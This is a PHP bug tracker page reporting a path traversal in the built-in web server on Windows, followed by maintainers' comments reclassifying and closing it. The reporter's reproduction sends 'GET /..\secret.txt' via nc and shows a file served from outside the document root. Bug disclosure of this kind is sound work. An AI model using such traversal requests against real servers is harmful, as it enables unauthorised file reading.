php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #62883 PHP built-in web server - path traversal
Submitted: 2012-08-21 21:11 UTC Modified: 2018-05-14 00:20 UTC
From: krzotr at gmail dot com Assigned: mattficken (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.4.6 OS: Windows XP
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: krzotr at gmail dot com
New email:
PHP Version: OS:

 

 [2012-08-21 21:11 UTC] krzotr at gmail dot com 
Description:
------------
PHP built-in web server able to read file outside web server root directory

Test script:
---------------
C:\>type secret.txt
My secret password: 0123456789
C:\php>php -S 127.0.0.1:8080
PHP 5.4.6 Development Server started at Tue Aug 21 22:55:38 2012
Listening on http://127.0.0.1:8080
Document root is C:\php
------------------------------------------------------------------------------
C:\Documents and Settings>nc 127.0.0.1 8080
GET /..\secret.txt

HTTP/0.9 200 OK
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 30

My secret password: 0123456789
------------------------------------------------------------------------------
Server log:
[Tue Aug 21 22:55:56 2012] 127.0.0.1:25202 [200]: /..\secret.txt

Expected result:
----------------
Invalid request

Actual result:
--------------
My secret password: 0123456789

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2012-09-23 15:12 UTC] laruence@php.net 
hmm, seems not reproduceable on linux, there maybe something wrong in the httpd 
parser while on windows.

anyway, built-in server targets at testing and deving purpose.  so, I think this 
is not that harmful :) 

thanks
 [2013-05-20 08:11 UTC] stas@php.net
-Assigned To: +Assigned To: moriyoshi
 [2017-10-24 06:33 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: moriyoshi +Assigned To:
 [2018-03-10 13:42 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2018-03-10 13:42 UTC] cmb@php.net 
According to our security issue classification[1], this would not
be a security issue, since the built-in webserver is not meant to
be used on a public network.

[1] <https://wiki.php.net/security#not_a_security_issue>
 [2018-03-13 01:14 UTC] mattficken@php.net 
An issue like this should probably be fixed regardless of policy.

But, I can NOT repro this issue on 7.2.2 on Windows.

I believe this issue was fixed a while ago.

-Thoughts?

Otherwise, I will close this bug.
 [2018-05-14 00:20 UTC] mattficken@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: mattficken
 [2018-05-14 00:20 UTC] mattficken@php.net 
see previous comment
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Fri Apr 19 05:01:29 2024 UTC